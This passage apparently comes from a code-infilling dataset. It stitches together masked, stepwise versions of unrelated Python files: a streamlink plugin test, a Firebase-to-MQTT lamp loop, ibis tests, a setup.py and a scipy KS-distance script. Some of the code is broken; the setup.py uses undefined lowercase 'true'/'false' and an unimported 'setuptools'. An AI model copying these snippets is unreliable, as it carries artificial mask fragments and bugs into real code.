"step-1": "<mask token>\n\n\nclass TestPluginFunimationNow(unittest.TestCase):\n\n def test_arguments(self):\n from streamlink_cli.main import setup_plugin_args\n session = Streamlink()\n parser = MagicMock()\n group = parser.add_argument_group('Plugin Options').add_argument_group(\n 'FunimationNow')\n session.plugins = {'funimationnow': FunimationNow}\n setup_plugin_args(session, parser)\n self.assertSequenceEqual(group.add_argument.mock_calls, [call(\n '--funimation-email', help=ANY), call('--funimation-password',\n help=ANY), call('--funimation-language', choices=['en', 'ja',\n 'english', 'japanese'], default='english', help=ANY)])\n",
"step-2": "<mask token>\n\n\nclass TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):\n <mask token>\n <mask token>\n\n\nclass TestPluginFunimationNow(unittest.TestCase):\n\n def test_arguments(self):\n from streamlink_cli.main import setup_plugin_args\n session = Streamlink()\n parser = MagicMock()\n group = parser.add_argument_group('Plugin Options').add_argument_group(\n 'FunimationNow')\n session.plugins = {'funimationnow': FunimationNow}\n setup_plugin_args(session, parser)\n self.assertSequenceEqual(group.add_argument.mock_calls, [call(\n '--funimation-email', help=ANY), call('--funimation-password',\n help=ANY), call('--funimation-language', choices=['en', 'ja',\n 'english', 'japanese'], default='english', help=ANY)])\n",
"step-3": "<mask token>\n\n\nclass TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):\n __plugin__ = FunimationNow\n should_match = ['http://www.funimation.com/anything',\n 'http://www.funimation.com/anything123',\n 'http://www.funimationnow.uk/anything',\n 'http://www.funimationnow.uk/anything123']\n\n\nclass TestPluginFunimationNow(unittest.TestCase):\n\n def test_arguments(self):\n from streamlink_cli.main import setup_plugin_args\n session = Streamlink()\n parser = MagicMock()\n group = parser.add_argument_group('Plugin Options').add_argument_group(\n 'FunimationNow')\n session.plugins = {'funimationnow': FunimationNow}\n setup_plugin_args(session, parser)\n self.assertSequenceEqual(group.add_argument.mock_calls, [call(\n '--funimation-email', help=ANY), call('--funimation-password',\n help=ANY), call('--funimation-language', choices=['en', 'ja',\n 'english', 'japanese'], default='english', help=ANY)])\n",
"step-4": "import unittest\nfrom unittest.mock import ANY, MagicMock, call\nfrom streamlink import Streamlink\nfrom streamlink.plugins.funimationnow import FunimationNow\nfrom tests.plugins import PluginCanHandleUrl\n\n\nclass TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):\n __plugin__ = FunimationNow\n should_match = ['http://www.funimation.com/anything',\n 'http://www.funimation.com/anything123',\n 'http://www.funimationnow.uk/anything',\n 'http://www.funimationnow.uk/anything123']\n\n\nclass TestPluginFunimationNow(unittest.TestCase):\n\n def test_arguments(self):\n from streamlink_cli.main import setup_plugin_args\n session = Streamlink()\n parser = MagicMock()\n group = parser.add_argument_group('Plugin Options').add_argument_group(\n 'FunimationNow')\n session.plugins = {'funimationnow': FunimationNow}\n setup_plugin_args(session, parser)\n self.assertSequenceEqual(group.add_argument.mock_calls, [call(\n '--funimation-email', help=ANY), call('--funimation-password',\n help=ANY), call('--funimation-language', choices=['en', 'ja',\n 'english', 'japanese'], default='english', help=ANY)])\n",
"step-5": "import unittest\nfrom unittest.mock import ANY, MagicMock, call\n\nfrom streamlink import Streamlink\nfrom streamlink.plugins.funimationnow import FunimationNow\nfrom tests.plugins import PluginCanHandleUrl\n\n\nclass TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):\n __plugin__ = FunimationNow\n\n should_match = [\n \"http://www.funimation.com/anything\",\n \"http://www.funimation.com/anything123\",\n \"http://www.funimationnow.uk/anything\",\n \"http://www.funimationnow.uk/anything123\",\n ]\n\n\nclass TestPluginFunimationNow(unittest.TestCase):\n def test_arguments(self):\n from streamlink_cli.main import setup_plugin_args\n session = Streamlink()\n parser = MagicMock()\n group = parser.add_argument_group(\"Plugin Options\").add_argument_group(\"FunimationNow\")\n\n session.plugins = {\n 'funimationnow': FunimationNow\n }\n\n setup_plugin_args(session, parser)\n self.assertSequenceEqual(\n group.add_argument.mock_calls,\n [\n call('--funimation-email', help=ANY),\n call('--funimation-password', help=ANY),\n call('--funimation-language', choices=[\"en\", \"ja\", \"english\", \"japanese\"], default=\"english\", help=ANY)\n ]\n )\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
firebase_admin.initialize_app(cred, {'databaseURL':
'https://mikro-b4844.firebaseio.com/'})
<|reserved_special_token_0|>
print(ref.get())
<|reserved_special_token_0|>
while True:
print(ref.get())
if ref.get() == 'Off' and i == 0:
i = 1
client = mqtt.Client()
client.connect('127.0.0.1', 1883, 60)
client.publish('building/lampu', 'Off')
if ref.get() == 'On' and i == 1:
i = 0
client = mqtt.Client()
client.connect('127.0.0.1', 1883, 60)
client.publish('building/lampu', 'On')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
cred = credentials.Certificate('iot_mikro.json')
firebase_admin.initialize_app(cred, {'databaseURL':
'https://mikro-b4844.firebaseio.com/'})
ref = db.reference('lampu')
print(ref.get())
i = 0
while True:
print(ref.get())
if ref.get() == 'Off' and i == 0:
i = 1
client = mqtt.Client()
client.connect('127.0.0.1', 1883, 60)
client.publish('building/lampu', 'Off')
if ref.get() == 'On' and i == 1:
i = 0
client = mqtt.Client()
client.connect('127.0.0.1', 1883, 60)
client.publish('building/lampu', 'On')
<|reserved_special_token_1|>
import firebase_admin
from firebase_admin import credentials
from firebase_admin import db
import paho.mqtt.client as mqtt
cred = credentials.Certificate('iot_mikro.json')
firebase_admin.initialize_app(cred, {'databaseURL':
'https://mikro-b4844.firebaseio.com/'})
ref = db.reference('lampu')
print(ref.get())
i = 0
while True:
print(ref.get())
if ref.get() == 'Off' and i == 0:
i = 1
client = mqtt.Client()
client.connect('127.0.0.1', 1883, 60)
client.publish('building/lampu', 'Off')
if ref.get() == 'On' and i == 1:
i = 0
client = mqtt.Client()
client.connect('127.0.0.1', 1883, 60)
client.publish('building/lampu', 'On')
<|reserved_special_token_1|>
import firebase_admin
from firebase_admin import credentials
from firebase_admin import db
import paho.mqtt.client as mqtt
# Fetch the service account key JSON file contents
cred = credentials.Certificate('iot_mikro.json')
# Initialize the app with a service account, granting admin privileges
firebase_admin.initialize_app(cred, {
'databaseURL': 'https://mikro-b4844.firebaseio.com/'
})
ref = db.reference('lampu')
print(ref.get())
i=0
while True:
print(ref.get())
if ref.get()=="Off" and i==0 :
i=1
client = mqtt.Client()
client.connect("127.0.0.1",1883,60)
client.publish("building/lampu", "Off")
if ref.get()=="On" and i==1 :
i=0
client = mqtt.Client()
client.connect("127.0.0.1",1883,60)
client.publish("building/lampu", "On")
# client.disconnect();
|
flexible
|
{
"blob_id": "acff8618754658104ac36214901d346447a0134f",
"index": 811,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfirebase_admin.initialize_app(cred, {'databaseURL':\n 'https://mikro-b4844.firebaseio.com/'})\n<mask token>\nprint(ref.get())\n<mask token>\nwhile True:\n print(ref.get())\n if ref.get() == 'Off' and i == 0:\n i = 1\n client = mqtt.Client()\n client.connect('127.0.0.1', 1883, 60)\n client.publish('building/lampu', 'Off')\n if ref.get() == 'On' and i == 1:\n i = 0\n client = mqtt.Client()\n client.connect('127.0.0.1', 1883, 60)\n client.publish('building/lampu', 'On')\n",
"step-3": "<mask token>\ncred = credentials.Certificate('iot_mikro.json')\nfirebase_admin.initialize_app(cred, {'databaseURL':\n 'https://mikro-b4844.firebaseio.com/'})\nref = db.reference('lampu')\nprint(ref.get())\ni = 0\nwhile True:\n print(ref.get())\n if ref.get() == 'Off' and i == 0:\n i = 1\n client = mqtt.Client()\n client.connect('127.0.0.1', 1883, 60)\n client.publish('building/lampu', 'Off')\n if ref.get() == 'On' and i == 1:\n i = 0\n client = mqtt.Client()\n client.connect('127.0.0.1', 1883, 60)\n client.publish('building/lampu', 'On')\n",
"step-4": "import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nimport paho.mqtt.client as mqtt\ncred = credentials.Certificate('iot_mikro.json')\nfirebase_admin.initialize_app(cred, {'databaseURL':\n 'https://mikro-b4844.firebaseio.com/'})\nref = db.reference('lampu')\nprint(ref.get())\ni = 0\nwhile True:\n print(ref.get())\n if ref.get() == 'Off' and i == 0:\n i = 1\n client = mqtt.Client()\n client.connect('127.0.0.1', 1883, 60)\n client.publish('building/lampu', 'Off')\n if ref.get() == 'On' and i == 1:\n i = 0\n client = mqtt.Client()\n client.connect('127.0.0.1', 1883, 60)\n client.publish('building/lampu', 'On')\n",
"step-5": "import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nimport paho.mqtt.client as mqtt\n\n# Fetch the service account key JSON file contents\ncred = credentials.Certificate('iot_mikro.json')\n# Initialize the app with a service account, granting admin privileges\nfirebase_admin.initialize_app(cred, {\n 'databaseURL': 'https://mikro-b4844.firebaseio.com/'\n})\n\nref = db.reference('lampu')\nprint(ref.get())\ni=0\nwhile True:\n print(ref.get())\n if ref.get()==\"Off\" and i==0 :\n i=1\n client = mqtt.Client()\n client.connect(\"127.0.0.1\",1883,60)\n client.publish(\"building/lampu\", \"Off\")\n if ref.get()==\"On\" and i==1 :\n i=0\n client = mqtt.Client()\n client.connect(\"127.0.0.1\",1883,60)\n client.publish(\"building/lampu\", \"On\")\n# client.disconnect();\n ",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from __future__ import annotations
import ibis
from ibis import _
def test_format_sql_query_result(con, snapshot):
t = con.table("airlines")
query = """
SELECT carrier, mean(arrdelay) AS avg_arrdelay
FROM airlines
GROUP BY 1
ORDER BY 2 DESC
"""
schema = ibis.schema({"carrier": "string", "avg_arrdelay": "double"})
with con.set_query_schema(query, schema):
expr = t.sql(query)
# name is autoincremented so we need to set it manually to make the
# snapshot stable
expr = expr.op().copy(name="foo").to_expr()
expr = expr.mutate(
island=_.carrier.lower(),
avg_arrdelay=_.avg_arrdelay.round(1),
)
snapshot.assert_match(repr(expr), "repr.txt")
def test_memoize_database_table(con, snapshot):
table = con.table("test1")
table2 = con.table("test2")
filter_pred = table["f"] > 0
table3 = table[filter_pred]
join_pred = table3["g"] == table2["key"]
joined = table2.inner_join(table3, [join_pred])
met1 = (table3["f"] - table2["value"]).mean().name("foo")
expr = joined.aggregate(
[met1, table3["f"].sum().name("bar")], by=[table3["g"], table2["key"]]
)
result = repr(expr)
assert result.count("test1") == 1
assert result.count("test2") == 1
snapshot.assert_match(result, "repr.txt")
def test_memoize_insert_sort_key(con, snapshot):
table = con.table("airlines")
t = table["arrdelay", "dest"]
expr = t.group_by("dest").mutate(
dest_avg=t.arrdelay.mean(), dev=t.arrdelay - t.arrdelay.mean()
)
worst = expr[expr.dev.notnull()].order_by(ibis.desc("dev")).limit(10)
result = repr(worst)
assert result.count("airlines") == 1
snapshot.assert_match(result, "repr.txt")
|
normal
|
{
"blob_id": "97ff8dae060475b0efbc8d39e9fc251be8ac091b",
"index": 6264,
"step-1": "<mask token>\n\n\ndef test_memoize_insert_sort_key(con, snapshot):\n table = con.table('airlines')\n t = table['arrdelay', 'dest']\n expr = t.group_by('dest').mutate(dest_avg=t.arrdelay.mean(), dev=t.\n arrdelay - t.arrdelay.mean())\n worst = expr[expr.dev.notnull()].order_by(ibis.desc('dev')).limit(10)\n result = repr(worst)\n assert result.count('airlines') == 1\n snapshot.assert_match(result, 'repr.txt')\n",
"step-2": "<mask token>\n\n\ndef test_format_sql_query_result(con, snapshot):\n t = con.table('airlines')\n query = \"\"\"\n SELECT carrier, mean(arrdelay) AS avg_arrdelay\n FROM airlines\n GROUP BY 1\n ORDER BY 2 DESC\n \"\"\"\n schema = ibis.schema({'carrier': 'string', 'avg_arrdelay': 'double'})\n with con.set_query_schema(query, schema):\n expr = t.sql(query)\n expr = expr.op().copy(name='foo').to_expr()\n expr = expr.mutate(island=_.carrier.lower(), avg_arrdelay=_.\n avg_arrdelay.round(1))\n snapshot.assert_match(repr(expr), 'repr.txt')\n\n\n<mask token>\n\n\ndef test_memoize_insert_sort_key(con, snapshot):\n table = con.table('airlines')\n t = table['arrdelay', 'dest']\n expr = t.group_by('dest').mutate(dest_avg=t.arrdelay.mean(), dev=t.\n arrdelay - t.arrdelay.mean())\n worst = expr[expr.dev.notnull()].order_by(ibis.desc('dev')).limit(10)\n result = repr(worst)\n assert result.count('airlines') == 1\n snapshot.assert_match(result, 'repr.txt')\n",
"step-3": "<mask token>\n\n\ndef test_format_sql_query_result(con, snapshot):\n t = con.table('airlines')\n query = \"\"\"\n SELECT carrier, mean(arrdelay) AS avg_arrdelay\n FROM airlines\n GROUP BY 1\n ORDER BY 2 DESC\n \"\"\"\n schema = ibis.schema({'carrier': 'string', 'avg_arrdelay': 'double'})\n with con.set_query_schema(query, schema):\n expr = t.sql(query)\n expr = expr.op().copy(name='foo').to_expr()\n expr = expr.mutate(island=_.carrier.lower(), avg_arrdelay=_.\n avg_arrdelay.round(1))\n snapshot.assert_match(repr(expr), 'repr.txt')\n\n\ndef test_memoize_database_table(con, snapshot):\n table = con.table('test1')\n table2 = con.table('test2')\n filter_pred = table['f'] > 0\n table3 = table[filter_pred]\n join_pred = table3['g'] == table2['key']\n joined = table2.inner_join(table3, [join_pred])\n met1 = (table3['f'] - table2['value']).mean().name('foo')\n expr = joined.aggregate([met1, table3['f'].sum().name('bar')], by=[\n table3['g'], table2['key']])\n result = repr(expr)\n assert result.count('test1') == 1\n assert result.count('test2') == 1\n snapshot.assert_match(result, 'repr.txt')\n\n\ndef test_memoize_insert_sort_key(con, snapshot):\n table = con.table('airlines')\n t = table['arrdelay', 'dest']\n expr = t.group_by('dest').mutate(dest_avg=t.arrdelay.mean(), dev=t.\n arrdelay - t.arrdelay.mean())\n worst = expr[expr.dev.notnull()].order_by(ibis.desc('dev')).limit(10)\n result = repr(worst)\n assert result.count('airlines') == 1\n snapshot.assert_match(result, 'repr.txt')\n",
"step-4": "from __future__ import annotations\nimport ibis\nfrom ibis import _\n\n\ndef test_format_sql_query_result(con, snapshot):\n t = con.table('airlines')\n query = \"\"\"\n SELECT carrier, mean(arrdelay) AS avg_arrdelay\n FROM airlines\n GROUP BY 1\n ORDER BY 2 DESC\n \"\"\"\n schema = ibis.schema({'carrier': 'string', 'avg_arrdelay': 'double'})\n with con.set_query_schema(query, schema):\n expr = t.sql(query)\n expr = expr.op().copy(name='foo').to_expr()\n expr = expr.mutate(island=_.carrier.lower(), avg_arrdelay=_.\n avg_arrdelay.round(1))\n snapshot.assert_match(repr(expr), 'repr.txt')\n\n\ndef test_memoize_database_table(con, snapshot):\n table = con.table('test1')\n table2 = con.table('test2')\n filter_pred = table['f'] > 0\n table3 = table[filter_pred]\n join_pred = table3['g'] == table2['key']\n joined = table2.inner_join(table3, [join_pred])\n met1 = (table3['f'] - table2['value']).mean().name('foo')\n expr = joined.aggregate([met1, table3['f'].sum().name('bar')], by=[\n table3['g'], table2['key']])\n result = repr(expr)\n assert result.count('test1') == 1\n assert result.count('test2') == 1\n snapshot.assert_match(result, 'repr.txt')\n\n\ndef test_memoize_insert_sort_key(con, snapshot):\n table = con.table('airlines')\n t = table['arrdelay', 'dest']\n expr = t.group_by('dest').mutate(dest_avg=t.arrdelay.mean(), dev=t.\n arrdelay - t.arrdelay.mean())\n worst = expr[expr.dev.notnull()].order_by(ibis.desc('dev')).limit(10)\n result = repr(worst)\n assert result.count('airlines') == 1\n snapshot.assert_match(result, 'repr.txt')\n",
"step-5": "from __future__ import annotations\n\nimport ibis\nfrom ibis import _\n\n\ndef test_format_sql_query_result(con, snapshot):\n t = con.table(\"airlines\")\n\n query = \"\"\"\n SELECT carrier, mean(arrdelay) AS avg_arrdelay\n FROM airlines\n GROUP BY 1\n ORDER BY 2 DESC\n \"\"\"\n schema = ibis.schema({\"carrier\": \"string\", \"avg_arrdelay\": \"double\"})\n\n with con.set_query_schema(query, schema):\n expr = t.sql(query)\n # name is autoincremented so we need to set it manually to make the\n # snapshot stable\n expr = expr.op().copy(name=\"foo\").to_expr()\n\n expr = expr.mutate(\n island=_.carrier.lower(),\n avg_arrdelay=_.avg_arrdelay.round(1),\n )\n\n snapshot.assert_match(repr(expr), \"repr.txt\")\n\n\ndef test_memoize_database_table(con, snapshot):\n table = con.table(\"test1\")\n table2 = con.table(\"test2\")\n\n filter_pred = table[\"f\"] > 0\n table3 = table[filter_pred]\n join_pred = table3[\"g\"] == table2[\"key\"]\n\n joined = table2.inner_join(table3, [join_pred])\n\n met1 = (table3[\"f\"] - table2[\"value\"]).mean().name(\"foo\")\n expr = joined.aggregate(\n [met1, table3[\"f\"].sum().name(\"bar\")], by=[table3[\"g\"], table2[\"key\"]]\n )\n\n result = repr(expr)\n assert result.count(\"test1\") == 1\n assert result.count(\"test2\") == 1\n\n snapshot.assert_match(result, \"repr.txt\")\n\n\ndef test_memoize_insert_sort_key(con, snapshot):\n table = con.table(\"airlines\")\n\n t = table[\"arrdelay\", \"dest\"]\n expr = t.group_by(\"dest\").mutate(\n dest_avg=t.arrdelay.mean(), dev=t.arrdelay - t.arrdelay.mean()\n )\n\n worst = expr[expr.dev.notnull()].order_by(ibis.desc(\"dev\")).limit(10)\n\n result = repr(worst)\n assert result.count(\"airlines\") == 1\n\n snapshot.assert_match(result, \"repr.txt\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
try:
from setuptools import setup
from setuptools import find_packages
has_setup_tools = true
except ImportError:
from distutils.core import setup
has_setup_tools = false
with open('README.md', 'r') as fh:
long_description = fh.read()
if has_setup_tools is True:
packages = setuptools.find_packages()
else:
packages = ['otmux']
setup(name='otmux', version='__version', description=
'multiple remote activities using ssh and tmux', long_description=
long_description, url='https://github.com/rda3mon/otmux', author=
'Mallikarjun', author_email='[email protected]', license=
'Apache License 2.0', packages=['otmux'], classifiers=[
'Topic :: tmux :: ssh',
'Development Status :: 2 - Experimental/Unstable',
'Environment :: Console', 'License :: Apache License 2.0',
'Programming Language :: Python :: 2.7',
'Operating System :: OS Independent'])
<|reserved_special_token_1|>
try:
from setuptools import setup
from setuptools import find_packages
has_setup_tools = true
except ImportError:
from distutils.core import setup
has_setup_tools = false
with open("README.md", "r") as fh:
long_description = fh.read()
if has_setup_tools is True:
packages = setuptools.find_packages()
else:
packages = ["otmux"]
setup(
name="otmux",
version="__version",
description="multiple remote activities using ssh and tmux",
long_description=long_description,
url="https://github.com/rda3mon/otmux",
author="Mallikarjun",
author_email="[email protected]",
license="Apache License 2.0",
packages=["otmux"],
classifiers=[
'Topic :: tmux :: ssh',
'Development Status :: 2 - Experimental/Unstable',
'Environment :: Console',
'License :: Apache License 2.0',
'Programming Language :: Python :: 2.7',
"Operating System :: OS Independent"
]
)
|
flexible
|
{
"blob_id": "5d988d159902e4a4cb17ee0ec61153de2dda4691",
"index": 9120,
"step-1": "<mask token>\n",
"step-2": "try:\n from setuptools import setup\n from setuptools import find_packages\n has_setup_tools = true\nexcept ImportError:\n from distutils.core import setup\n has_setup_tools = false\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\nif has_setup_tools is True:\n packages = setuptools.find_packages()\nelse:\n packages = ['otmux']\nsetup(name='otmux', version='__version', description=\n 'multiple remote activities using ssh and tmux', long_description=\n long_description, url='https://github.com/rda3mon/otmux', author=\n 'Mallikarjun', author_email='[email protected]', license=\n 'Apache License 2.0', packages=['otmux'], classifiers=[\n 'Topic :: tmux :: ssh',\n 'Development Status :: 2 - Experimental/Unstable',\n 'Environment :: Console', 'License :: Apache License 2.0',\n 'Programming Language :: Python :: 2.7',\n 'Operating System :: OS Independent'])\n",
"step-3": "try:\n from setuptools import setup\n from setuptools import find_packages\n has_setup_tools = true\nexcept ImportError:\n from distutils.core import setup\n has_setup_tools = false\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nif has_setup_tools is True:\n packages = setuptools.find_packages()\nelse:\n packages = [\"otmux\"]\n\nsetup(\n name=\"otmux\",\n version=\"__version\",\n description=\"multiple remote activities using ssh and tmux\",\n long_description=long_description,\n url=\"https://github.com/rda3mon/otmux\",\n author=\"Mallikarjun\",\n author_email=\"[email protected]\",\n license=\"Apache License 2.0\",\n packages=[\"otmux\"],\n classifiers=[\n 'Topic :: tmux :: ssh',\n 'Development Status :: 2 - Experimental/Unstable',\n 'Environment :: Console',\n 'License :: Apache License 2.0',\n 'Programming Language :: Python :: 2.7',\n \"Operating System :: OS Independent\"\n ]\n)\n\n\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def weib(x, nn, a):
return a / nn * (x / nn) ** (a - 1) * n.exp(-(x / nn) ** a)
<|reserved_special_token_0|>
print('distancias de KS para os modelos matematicos:', diffN, diffN2, diffU,
diffU2, diffW, diffP)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
a = st.norm(0, 1)
b = st.norm(0.1, 1)
domain = n.linspace(-4, 4, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffN = n.abs(avals - bvals).max()
a = st.norm(0, 1)
b = st.norm(0, 1.2)
domain = n.linspace(-4, 4, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffN2 = n.abs(avals - bvals).max()
a = st.uniform(0, 1)
b = st.uniform(0.05, 1.0)
domain = n.linspace(0, 1.05, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffU = n.abs(avals - bvals).max()
a = st.uniform(0, 1)
b = st.uniform(-0.05, 1.05)
domain = n.linspace(0, 1.05, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffU2 = n.abs(avals - bvals).max()
x = n.linspace(0, 20, 100000)
step = x[1] - x[0]
def weib(x, nn, a):
return a / nn * (x / nn) ** (a - 1) * n.exp(-(x / nn) ** a)
W = weib(x, 1.0, 1.5)
W_ = W / (W * step).sum()
W__ = n.cumsum(W_)
W2 = weib(x, 1.0, 1.7)
W2_ = W2 / (W2 * step).sum()
W2__ = n.cumsum(W2_)
diffW = n.abs(W_ - W2_).max()
a = st.powerlaw(1.5)
b = st.powerlaw(1.7)
domain = n.linspace(0, 5.05, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffP = n.abs(avals - bvals).max()
print('distancias de KS para os modelos matematicos:', diffN, diffN2, diffU,
diffU2, diffW, diffP)
lb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7
x = n.linspace(lb, rb, NE)
step = x[1] - x[0]
W = weib(x, 1.0, shape1)
W_ = W / (W * step).sum()
W__ = n.cumsum(W_)
W2 = weib(x, 1.0, shape2)
W2_ = W2 / (W2 * step).sum()
W2__ = n.cumsum(W2_)
diffW = n.abs(W__ - W2__).max()
lb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7
x = n.linspace(lb, rb, NE)
step = x[1] - x[0]
W = weib(x, 1.0, shape1)
W_ = W / W.sum()
W__ = n.cumsum(W_)
W2 = weib(x, 1.0, shape2)
W2_ = W2 / W2.sum()
W2__ = n.cumsum(W2_)
diffW = n.abs(W__ - W2__).max()
<|reserved_special_token_1|>
import numpy as n, pylab as p
from scipy import stats as st
a = st.norm(0, 1)
b = st.norm(0.1, 1)
domain = n.linspace(-4, 4, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffN = n.abs(avals - bvals).max()
a = st.norm(0, 1)
b = st.norm(0, 1.2)
domain = n.linspace(-4, 4, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffN2 = n.abs(avals - bvals).max()
a = st.uniform(0, 1)
b = st.uniform(0.05, 1.0)
domain = n.linspace(0, 1.05, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffU = n.abs(avals - bvals).max()
a = st.uniform(0, 1)
b = st.uniform(-0.05, 1.05)
domain = n.linspace(0, 1.05, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffU2 = n.abs(avals - bvals).max()
x = n.linspace(0, 20, 100000)
step = x[1] - x[0]
def weib(x, nn, a):
return a / nn * (x / nn) ** (a - 1) * n.exp(-(x / nn) ** a)
W = weib(x, 1.0, 1.5)
W_ = W / (W * step).sum()
W__ = n.cumsum(W_)
W2 = weib(x, 1.0, 1.7)
W2_ = W2 / (W2 * step).sum()
W2__ = n.cumsum(W2_)
diffW = n.abs(W_ - W2_).max()
a = st.powerlaw(1.5)
b = st.powerlaw(1.7)
domain = n.linspace(0, 5.05, 10000)
avals = a.cdf(domain)
bvals = b.cdf(domain)
diffP = n.abs(avals - bvals).max()
print('distancias de KS para os modelos matematicos:', diffN, diffN2, diffU,
diffU2, diffW, diffP)
lb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7
x = n.linspace(lb, rb, NE)
step = x[1] - x[0]
W = weib(x, 1.0, shape1)
W_ = W / (W * step).sum()
W__ = n.cumsum(W_)
W2 = weib(x, 1.0, shape2)
W2_ = W2 / (W2 * step).sum()
W2__ = n.cumsum(W2_)
diffW = n.abs(W__ - W2__).max()
lb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7
x = n.linspace(lb, rb, NE)
step = x[1] - x[0]
W = weib(x, 1.0, shape1)
W_ = W / W.sum()
W__ = n.cumsum(W_)
W2 = weib(x, 1.0, shape2)
W2_ = W2 / W2.sum()
W2__ = n.cumsum(W2_)
diffW = n.abs(W__ - W2__).max()
<|reserved_special_token_1|>
import numpy as n, pylab as p
from scipy import stats as st
a=st.norm(0,1)
b=st.norm(0.1,1)
domain=n.linspace(-4,4,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffN=n.abs(avals-bvals).max()
a=st.norm(0,1)
b=st.norm(0,1.2)
domain=n.linspace(-4,4,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffN2=n.abs(avals-bvals).max()
a=st.uniform(0,1)
b=st.uniform(0.05,1.0)
domain=n.linspace(0,1.05,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffU=n.abs(avals-bvals).max()
a=st.uniform(0,1)
b=st.uniform(-0.05,1.05)
domain=n.linspace(0,1.05,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffU2=n.abs(avals-bvals).max()
#a=st.weibull(1.5)
#b=st.weibull(1.7)
#domain=n.linspace(0,1.05,10000)
#avals=a.cdf(domain)
#bvals=b.cdf(domain)
#diffW=n.abs(avals-bvals).max()
#a=st.power(1.5)
#b=st.power(1.7)
#domain=n.linspace(0,1.05,10000)
#avals=a.cdf(domain)
#bvals=b.cdf(domain)
#diffP=n.abs(avals-bvals).max()
#x = n.arange(1,100.)/50.
x=n.linspace(0,20,100000)
step=x[1]-x[0]
def weib(x,nn,a):
return (a / nn) * (x / nn)**(a - 1) * n.exp(-(x / nn)**a)
#count, bins, ignored = p.hist(n.random.weibull(5.,1000))
#x = n.arange(1,100.)/50.
#scale = count.max()/weib(x, 1., 5.).max()
W=weib(x, 1., 1.5)
W_=W/(W*step).sum()
W__=n.cumsum(W_)
W2=weib(x, 1., 1.7)
W2_=W2/(W2*step).sum()
W2__=n.cumsum(W2_)
diffW=n.abs(W_-W2_).max()
#p.plot(x, W_)
#p.plot(x, W2_)
##p.plot(x, weib(x, 1., 5.)*scale)
#p.show()
a=st.powerlaw(1.5)
b=st.powerlaw(1.7)
domain=n.linspace(0,5.05,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffP=n.abs(avals-bvals).max()
print("distancias de KS para os modelos matematicos:", diffN,diffN2,diffU,diffU2,diffW,diffP)
# distancias de KS para os modelos matematicos:
# 0.0398776116762 0.0439947104098 0.0952338090952 0.047619047619 0.128565475845 0.0460149130584
# X = (-n.ln(U))^{1/a}
lb,rb,NE,shape1,shape2=0,10,10000,1.5,1.7
x=n.linspace(lb,rb,NE)
step=x[1]-x[0]
W=weib(x, 1., shape1)
W_=W/((W*step).sum())
W__=n.cumsum(W_)
W2=weib(x, 1., shape2)
W2_=W2/((W2*step).sum())
W2__=n.cumsum(W2_)
diffW=n.abs(W__-W2__).max()
lb,rb,NE,shape1,shape2=0,10,10000,1.5,1.7
x=n.linspace(lb,rb,NE)
step=x[1]-x[0]
W=weib(x, 1., shape1)
W_=W/((W).sum())
W__=n.cumsum(W_)
W2=weib(x, 1., shape2)
W2_=W2/((W2).sum())
W2__=n.cumsum(W2_)
diffW=n.abs(W__-W2__).max()
|
flexible
|
{
"blob_id": "647258ee5f2f6f1cb8118bcf146b8959c65b70cd",
"index": 8045,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef weib(x, nn, a):\n return a / nn * (x / nn) ** (a - 1) * n.exp(-(x / nn) ** a)\n\n\n<mask token>\nprint('distancias de KS para os modelos matematicos:', diffN, diffN2, diffU,\n diffU2, diffW, diffP)\n<mask token>\n",
